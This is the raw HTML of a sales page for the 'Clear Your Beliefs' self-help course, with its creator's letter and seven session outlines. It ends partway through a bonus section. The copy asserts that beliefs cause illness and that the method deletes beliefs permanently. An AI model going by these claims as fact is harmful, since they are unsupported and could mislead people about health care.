success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a 